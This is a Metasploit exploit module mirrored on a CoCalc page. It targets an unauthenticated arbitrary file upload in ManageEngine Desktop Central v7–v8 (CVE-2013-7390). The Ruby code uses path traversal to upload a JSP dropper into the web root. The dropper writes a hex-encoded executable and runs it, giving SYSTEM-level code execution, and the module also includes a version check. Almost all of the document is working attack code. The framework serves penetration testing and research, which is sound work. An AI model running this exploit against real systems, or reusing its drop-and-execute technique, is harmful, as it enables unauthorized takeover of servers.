CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/http/desktopcentral_file_upload.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::EXE10include Msf::Exploit::FileDropper1112def initialize(info = {})13super(update_info(info,14'Name' => 'ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload',15'Description' => %q{16This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to17v8 build 80293. A malicious user can upload a JSP file into the web root without18authentication, leading to arbitrary code execution as SYSTEM.19},20'Author' =>21[22'Thomas Hibbert <thomas.hibbert[at]security-assessment.com>' # Vulnerability discovery and MSF module23],24'License' => MSF_LICENSE,25'References' =>26[27['CVE', '2013-7390'],28['OSVDB', '100008'],29['URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf'],30['URL', 'https://seclists.org/fulldisclosure/2013/Nov/130'],31],32'Platform' => 'win',33'Arch' => ARCH_X86,34'Targets' =>35[36[ 'Desktop Central v7 - v8 build 80292 / Windows', {} ]37],38'Privileged' => true,39'DefaultTarget' => 0,40'DisclosureDate' => '2013-11-11'41))4243register_options([Opt::RPORT(8020)])44end454647def upload_file(filename, contents)48res = send_request_cgi({49'uri' => normalize_uri('agentLogUploader'),50'method' => 'POST',51'data' => contents,52'ctype' => 'text/html',53'encode_params' => false,54'vars_get' => {55'computerName' => 'DesktopCentral',56'domainName' => 'webapps',57'customerId' => '..',58'filename' => filename59}60})6162if res && res.code == 200 && res.body.to_s.empty?63return true64else65return false66end67end6869# Test for Desktop Central70def check71res = send_request_cgi({72'uri' => normalize_uri("configurations.do"),73'method' => 'GET'74})7576if res && res.code == 20077build = nil7879if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||80res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v78182print_status("Detected Desktop Central v7")83elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||84res.body.to_s =~ /ManageEngine Desktop Central MSP 8/8586if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions)87build = $188print_status("Detected Desktop Central v8 #{build}")89else # DC v8 (earlier versions)90print_status("Detected Desktop Central v8")91end92elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)93build = $194end9596if build.nil?97return Exploit::CheckCode::Unknown98elsif Rex::Version.new(build) < Rex::Version.new("80293")99return Exploit::CheckCode::Appears100else101return Exploit::CheckCode::Safe102end103end104105Exploit::CheckCode::Unknown106end107108109def exploit110print_status("Uploading JSP to execute the payload")111112exe = payload.encoded_exe113exe_filename = rand_text_alpha_lower(8) + ".exe"114115dropper = jsp_drop_and_execute(exe, exe_filename)116dropper_filename = rand_text_alpha_lower(8) + ".jsp"117118if upload_file(dropper_filename, dropper)119register_files_for_cleanup(exe_filename)120register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{dropper_filename}")121else122fail_with(Failure::Unknown, "#{peer} - JSP upload failed")123end124125print_status("Executing payload")126send_request_cgi(127{128'uri' => normalize_uri(dropper_filename),129'method' => 'GET'130})131end132133134def jsp_drop_bin(bin_data, output_file)135jspraw = %Q|<%@ page import="java.io.*" %>\n|136jspraw << %Q|<%\n|137jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|138139jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|140141jspraw << %Q|int numbytes = data.length();\n|142143jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|144jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|145jspraw << %Q|{\n|146jspraw << %Q| char char1 = (char) data.charAt(counter);\n|147jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|148jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|149jspraw << %Q| comb <<= 4;\n|150jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|151jspraw << %Q| bytes[counter/2] = (byte)comb;\n|152jspraw << %Q|}\n|153154jspraw << %Q|outputstream.write(bytes);\n|155jspraw << %Q|outputstream.close();\n|156jspraw << %Q|%>\n|157158jspraw159end160161162def jsp_execute_command(command)163jspraw = %Q|\n|164jspraw << %Q|<%\n|165jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|166jspraw << %Q|%>\n|167168jspraw169end170171172def jsp_drop_and_execute(bin_data, output_file)173jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)174end175end176177178